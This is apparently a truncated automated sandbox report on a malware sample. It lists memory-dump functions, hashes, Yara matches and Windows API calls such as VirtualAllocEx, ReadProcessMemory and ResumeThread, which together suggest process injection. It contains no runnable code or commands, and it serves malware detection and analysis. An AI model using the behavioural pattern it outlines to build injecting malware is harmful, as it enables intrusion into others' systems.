• Instruction ID: 8a53159ae335bf1e71b15dcd675ea00ae93bf62cddf2e4cecb1e25c7a9007014
• Opcode Fuzzy Hash: 5f5129a832d1362cd6a3ac4f6614b126f0c5ef18660759856e788ff27c3b5e02
• Instruction Fuzzy Hash: 992138B1D002098FDB10DFAAC485BEEFBF4EF48324F50842AD459A7240CB789944CFA5

Control-flow Graph: [graph image not reproduced; basic blocks 7d05c38-7d05cfe, call to ReadProcessMemory in block 7d05c38-7d05cc5]
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D05CB8
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: a7e72bec90ac7061b774a50795d939b2e7085ca1cc622b6132dae7f306d87787
• Instruction ID: 722a7fe180b1bc9b14f8f0b28886e188f056bfbc8b975e21c1e14eddb4b14c3c
• Opcode Fuzzy Hash: a7e72bec90ac7061b774a50795d939b2e7085ca1cc622b6132dae7f306d87787
• Instruction Fuzzy Hash: 692116B18002599FCB10DFAAC945ADEFBF5FF48310F10842AE959A7250C7349554CBA4

Control-flow Graph: [graph image not reproduced; basic blocks 161f8a0-161f95a, call to DuplicateHandle in block 161f8a0-161f934]
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0161F927
Memory Dump Source
• Source File: 00000000.00000002.1724836918.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1610000_n0srYVYMDI.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 3403bd9c4fa79d3344bc9b9883ab8dbb01da1b6a279105ea13ae529ff6b22108
• Instruction ID: 17a15efdc66af7d5ed12fc6f57f8a9faa13d0dc0c08de6249b796313c2bc172f
• Opcode Fuzzy Hash: 3403bd9c4fa79d3344bc9b9883ab8dbb01da1b6a279105ea13ae529ff6b22108
• Instruction Fuzzy Hash: 1B21E4B5900208AFDB10DFAAD984ADEBFF5FB48310F14841AE958A3310C374A944CFA4

Control-flow Graph: [graph image not reproduced; basic blocks 7d05a83-7d05b31, call to VirtualAllocEx in block 7d05a83-7d05b03]
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D05AF6
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 6fdfa000a14131f913662812e398f09c1e464308f141e7ae9bc85eb64c6547d7
• Instruction ID: daa80cddde1a4b6a3809f26cc96f5b2dc9a300f03be060eb3919197e2d49e371
• Opcode Fuzzy Hash: 6fdfa000a14131f913662812e398f09c1e464308f141e7ae9bc85eb64c6547d7
• Instruction Fuzzy Hash: 651189B58002499FCB10DFAAC845BDEFFF5EF48320F20841AE455A7250C775A950CFA0

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D05AF6
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 214186d9305b9f1f7fad8eee6725d2b75297f8787d269ac96ac3618dfc7ad58f
• Instruction ID: 1254c23a0c8e051e35dfd570b84e0e81076cc96f4a6a60fe00ba3980076934b0
• Opcode Fuzzy Hash: 214186d9305b9f1f7fad8eee6725d2b75297f8787d269ac96ac3618dfc7ad58f
• Instruction Fuzzy Hash: 751137B19002499FCB10DFAAC845BDEFFF5EF88320F108419E559A7250C775A954CFA4

APIs
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 5643e7d9e3308482680c8814f87f9a173442ff13766017712529db75bf865ce2
• Instruction ID: dca3ca65bebf07745a0bc26877a9e08ec5975ba55d724ac2357554b6a650af4c
• Opcode Fuzzy Hash: 5643e7d9e3308482680c8814f87f9a173442ff13766017712529db75bf865ce2
• Instruction Fuzzy Hash: 07116DB19002498FCB10DFAAD4457DEFBF5EB88324F20841AD459A7250C734A544CF94

APIs
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
                                                                                                                                            • Opcode ID: 17b93feb798c504a8824b330e331dc1db2f5268d16743030726dfed6e91a9cbf
                                                                                                                                            • Instruction ID: 45e77630d7531e83045d34747a614dbee591c1aa40176119e73bb0ba5f31bfe2
                                                                                                                                            • Opcode Fuzzy Hash: 17b93feb798c504a8824b330e331dc1db2f5268d16743030726dfed6e91a9cbf
                                                                                                                                            • Instruction Fuzzy Hash: 4D113AB19002498FCB10DFAAD449BDEFBF5EB88324F208419D559A7250C775A944CF94
                                                                                                                                            APIs
                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D08275
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                            • Opcode ID: 46d71bea8015638b4275fbadf0a8be9421e6f47d66234bebf7261a8ff3051dcd
                                                                                                                                            • Instruction ID: 3dcbcff3e43884fa65a378914c316298cada1251197da8a4822db71a86fddc75
                                                                                                                                            • Opcode Fuzzy Hash: 46d71bea8015638b4275fbadf0a8be9421e6f47d66234bebf7261a8ff3051dcd
                                                                                                                                            • Instruction Fuzzy Hash: 9011E3B5800249DFDB10DF9AD545BDEBBF8EB48320F10841AE558A7650C375A584CFA1
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0161D626
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724836918.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_1610000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: 15e75d8a4a76ba6fa718f9e9153da81452633e55efb62df71aa9e4c75b0604c8
                                                                                                                                            • Instruction ID: 8dee69b0b59b875c8d360ae5ffcb15a8f5b3872b1c80063514546ff6338ab601
                                                                                                                                            • Opcode Fuzzy Hash: 15e75d8a4a76ba6fa718f9e9153da81452633e55efb62df71aa9e4c75b0604c8
                                                                                                                                            • Instruction Fuzzy Hash: 331110B5C002598FDB10DF9AC848ADEFBF4AB88324F14842AD458B7210C379A545CFA5
                                                                                                                                            APIs
                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D08275
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                            • Opcode ID: 89c76b74bc241e21669db68c852299f6e79594203306e2060fdc91fc13a6237c
                                                                                                                                            • Instruction ID: cf5f23e1fc8a2c629703f5e77b9c0a20f14a68de04016c157bd05b9f27d5c4e0
                                                                                                                                            • Opcode Fuzzy Hash: 89c76b74bc241e21669db68c852299f6e79594203306e2060fdc91fc13a6237c
                                                                                                                                            • Instruction Fuzzy Hash: 1911F2B5800749DFCB10DFAAC489BDEFBF8EB48320F10841AE558A7250C375A984CFA1
                                                                                                                                            APIs
                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D08275
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                            • Opcode ID: 88434bde3ed3d9cd73b1cdd8c26bf38dafae61138c99b0075b37ab541d1b99d2
                                                                                                                                            • Instruction ID: e01b15825944cb97693c001397b34dc27473592e903595252cb167bd7e847872
                                                                                                                                            • Opcode Fuzzy Hash: 88434bde3ed3d9cd73b1cdd8c26bf38dafae61138c99b0075b37ab541d1b99d2
                                                                                                                                            • Instruction Fuzzy Hash: 14E04FB6805204CEDB219B69E0043CDFBE0DB90324F24846AC599975A0C6795484CEE1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724533168.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15bd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 56e84829b43068b2b8567617c4d261afff77fe0dd88071b1556691f6671c385a
                                                                                                                                            • Instruction ID: fccc045c06d46586bb00aecd19793ee08fda9a9b7bbf261883910b579dd3aaed
                                                                                                                                            • Opcode Fuzzy Hash: 56e84829b43068b2b8567617c4d261afff77fe0dd88071b1556691f6671c385a
                                                                                                                                            • Instruction Fuzzy Hash: 6F212871500204DFDB05DF58D9C0BAABFB5FB94318F20C569D9094F256C37AE456C6A1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724533168.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15bd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 999edc37edcdb7d58870bbe9ca55a5586e246cb09352e7da9c75377af1a8884f
                                                                                                                                            • Instruction ID: 5fdb6fcbb609858f14717c95c8d1b1e78bb2e02075e173ea4a9aeb1ada3239f1
                                                                                                                                            • Opcode Fuzzy Hash: 999edc37edcdb7d58870bbe9ca55a5586e246cb09352e7da9c75377af1a8884f
                                                                                                                                            • Instruction Fuzzy Hash: 4C212271500240DFDB05DF58D9C0B6ABFB5FB8831CF20C569E9090F296C33AD456CAA2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724600540.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15cd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 28b7a95e17d7adc17699cdcca754ace51f9ad18bf5179bf7ce352951eca43e2f
                                                                                                                                            • Instruction ID: 52e3dd6196ddc941f696c3092f58356cd665ff95d7db74ac60485121c78b1e67
                                                                                                                                            • Opcode Fuzzy Hash: 28b7a95e17d7adc17699cdcca754ace51f9ad18bf5179bf7ce352951eca43e2f
                                                                                                                                            • Instruction Fuzzy Hash: A8210075604200DFCB15DF98D984B2ABBB5FB84B14F20C97DD80A9F256D33AD447CAA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724600540.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15cd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 56673758f1b7f1278bb9d931b095cc9b60e2ed0e446bc3d6ae7d2c9e86338133
                                                                                                                                            • Instruction ID: 667459e4a9fb61c175fd19ba9bbd6c9b094eff0f36b29f274077d75a21852859
                                                                                                                                            • Opcode Fuzzy Hash: 56673758f1b7f1278bb9d931b095cc9b60e2ed0e446bc3d6ae7d2c9e86338133
                                                                                                                                            • Instruction Fuzzy Hash: 9D21F571504200DFDB05DF98D9C4B2ABBB6FB84724F20C97DD9498F256C33AD446CAA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724600540.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15cd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5d22f97396d99d3e488d4d823b7912d68751f4de9a981e63db4c8c9cb8942104
                                                                                                                                            • Instruction ID: e80a9362568cafb070cc37fdb4846c489a0df1a53c1c8199450973a00b1652ec
                                                                                                                                            • Opcode Fuzzy Hash: 5d22f97396d99d3e488d4d823b7912d68751f4de9a981e63db4c8c9cb8942104
                                                                                                                                            • Instruction Fuzzy Hash: 06217F755093808FDB12CF68D594715BF71FB46214F28C5EAD8498F6A7C33A980ACBA2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724533168.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15bd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                            • Instruction ID: 6840a449b03ab5dec003b8a5cf2d7489c95de20fd76eecd853b5f9721f2efea2
                                                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                            • Instruction Fuzzy Hash: 4111DF72404240CFDB02CF44D5C4B9ABF71FB94328F24C6A9D9090F256C37AE45ACBA2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724533168.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15bd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                            • Instruction ID: 8ba333a9180542a34ef5e1beb4c72484da9e8e420cccc368dbb281e79dd3133b
                                                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                            • Instruction Fuzzy Hash: 8B11E172404280CFCB02CF54D5C4B5ABF71FB84318F24C6A9D8090F256C33AD45ACBA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724600540.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15cd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                            • Instruction ID: bac7f087fa5525c4eedaf07bd7b4cc4bbc79f7c6ca3fcd44a32a84954f943b61
                                                                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                            • Instruction Fuzzy Hash: BD11BE75504240DFDB02CF94C5C4B19BF72FB84624F24C6AED8498F256C33AD40ACB91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2b6a502c4f03314993a6106139162cbf8012de501cdecf43b3339e9edeffa363
                                                                                                                                            • Instruction ID: da8c90a0d11c5e17e038a75cdc3b841c8d96de8aad43bef67d6c5e62ffdea5bc
                                                                                                                                            • Opcode Fuzzy Hash: 2b6a502c4f03314993a6106139162cbf8012de501cdecf43b3339e9edeffa363
                                                                                                                                            • Instruction Fuzzy Hash: 13E1F8B4E001198FDB14DFA9D584AAEFBB2FF89304F24D169D815AB356D730A941CFA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f9f6a122266f3037e9c86d2dbfa71b2c290be3e61db62653a32ef97a3a4c9297
                                                                                                                                            • Instruction ID: 988254b5632eda901c0780fb1ef2a225b5f3343abaea33630ffce62cb89ab230
                                                                                                                                            • Opcode Fuzzy Hash: f9f6a122266f3037e9c86d2dbfa71b2c290be3e61db62653a32ef97a3a4c9297
                                                                                                                                            • Instruction Fuzzy Hash: 2DE1E7B4E001198FDB14DFA9C584AAEFBB2FF89304F24D169E415AB356D731A941CFA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c297fd9acdd3f0101cd4f9139059dc2154fcc1bf75fde13a0c9740a041abd654
                                                                                                                                            • Instruction ID: 56f85b2dd2c5e8dc4e24c80028c70911885a937ae2bd201025c96efbbe9d5d3b
                                                                                                                                            • Opcode Fuzzy Hash: c297fd9acdd3f0101cd4f9139059dc2154fcc1bf75fde13a0c9740a041abd654
                                                                                                                                            • Instruction Fuzzy Hash: FDE1E6B4E011198FDB14DFA9C584AAEFBB2FB89304F24D169D415AB356D730AD42CFA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1414a56e908ea2d8f4dbe535a0c056fe5fefee13f22410c2615771e228d9ae97
                                                                                                                                            • Instruction ID: 17e7d085ef5cfabe105b5dcfcddc870a06ce0088096b7593ef524ac1402baa63
                                                                                                                                            • Opcode Fuzzy Hash: 1414a56e908ea2d8f4dbe535a0c056fe5fefee13f22410c2615771e228d9ae97
                                                                                                                                            • Instruction Fuzzy Hash: 64E1D7B4E001198FDB14DFA9C580AAEFBB2FF89304F24D169E415AB356D731A941CFA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e83cd285874dd640c5aca0b947641c3d8f506f7429a51d78d0a029fea5a78578
                                                                                                                                            • Instruction ID: da81016e2941e1a3c4fed782b88ef65d11cbe5822d032b54bbc56df40901a43f
                                                                                                                                            • Opcode Fuzzy Hash: e83cd285874dd640c5aca0b947641c3d8f506f7429a51d78d0a029fea5a78578
                                                                                                                                            • Instruction Fuzzy Hash: FAE1E8B4E001198FDB14DFA9C584AAEFBB2FF89304F24D169D415AB356DB30A941CFA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 903de95c1c3cd192a21af4abce7b64b337058ac02a19a37cda2f2a646fba84cd
                                                                                                                                            • Instruction ID: 9916477a7cc7f438a29cc258c5ba7d578a8f978dbe10c6eff1274643e4341a85
                                                                                                                                            • Opcode Fuzzy Hash: 903de95c1c3cd192a21af4abce7b64b337058ac02a19a37cda2f2a646fba84cd
                                                                                                                                            • Instruction Fuzzy Hash: 84511AB4E012198FDB14CFAAC5845AEFBF2FF89304F24D16AD418AB256D7319941CFA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7a8aacfc7fcd70f96db6c7fb4af6c2d3e91c574f0cf4b7f38146c74ba35962e8
                                                                                                                                            • Instruction ID: 8d335df8656274043c075836e372f6c2a48b9ab9cb6bf9e318319a43b6919cf5
                                                                                                                                            • Opcode Fuzzy Hash: 7a8aacfc7fcd70f96db6c7fb4af6c2d3e91c574f0cf4b7f38146c74ba35962e8
                                                                                                                                            • Instruction Fuzzy Hash: F5F01D74929254CBCF10CF58D4553E8FFB8BB5A362F003096D40EA6391DB709A85CE91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f717476b19aefa826a1c9fb7b29060ef0676f23f9d21e7a7dc7eb6fa6b5b1727
                                                                                                                                            • Instruction ID: 32a1a69b86bdee9b527110d98dbc4b6da722785b14cb9ed8cde70d206b3f9a02
                                                                                                                                            • Opcode Fuzzy Hash: f717476b19aefa826a1c9fb7b29060ef0676f23f9d21e7a7dc7eb6fa6b5b1727
                                                                                                                                            • Instruction Fuzzy Hash: F2F0127495A1448FCF108B98D4551F4FF78AB5B321F007096D44E9B652DA30A5558FA0

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.4%
                                                                                                                                            Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                            Signature Coverage:5.7%
                                                                                                                                            Total number of Nodes:557
                                                                                                                                            Total number of Limit Nodes:73
[Execution graph: node/edge listing rendered as a figure in the original report. Named API calls appearing on graph nodes: LdrLoadDll, LdrInitializeThunk, NtCreateFile, NtReadFile, NtClose, NtAllocateVirtualMemory, RtlAllocateHeap, RtlFreeHeap, LookupPrivilegeValueW, ExitProcess. Listing truncated in the source.]
408328 97245->97246 97247 408343 97246->97247 97248 40ace0 LdrLoadDll 97246->97248 97249 414e40 LdrLoadDll 97247->97249 97248->97247 97250 408353 97249->97250 97251 40835c PostThreadMessageW 97250->97251 97252 408370 97250->97252 97251->97252 97252->97172 97254 40f673 97253->97254 97260 419e50 97254->97260 97258 419d2c 97257->97258 97259 41af20 LdrLoadDll 97257->97259 97258->97180 97259->97258 97261 419e6c 97260->97261 97262 41af20 LdrLoadDll 97260->97262 97265 1792dd0 LdrInitializeThunk 97261->97265 97262->97261 97263 40f69e 97263->97172 97265->97263 97266->97102 97268 419f9c 97267->97268 97269 41af20 LdrLoadDll 97267->97269 97272 1792f30 LdrInitializeThunk 97268->97272 97269->97268 97270 40f4ee 97270->97108 97270->97109 97272->97270 97273->97114 97274->97119 97275->97124 97279 1792ad0 LdrInitializeThunk

Control-flow Graph
control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
APIs
• NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
Strings
Memory Dump Source
• Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: !JA$bMA$bMA
• API String ID: 2738559852-4222312340
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4

Control-flow Graph
control_flow_graph 268 40ace0-40acfc 269 40ad04-40ad09 268->269 270 40acff call 41cc10 268->270 271 40ad0b-40ad0e 269->271 272 40ad0f-40ad1d call 41d030 269->272 270->269 275 40ad2d-40ad3e call 41b460 272->275 276 40ad1f-40ad2a call 41d2b0 272->276 281 40ad40-40ad54 LdrLoadDll 275->281 282 40ad57-40ad5a 275->282 276->275 281->282
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
Memory Dump Source
• Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
• Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95

Control-flow Graph
control_flow_graph 283 41a320-41a371 call 41af20 NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
Memory Dump Source
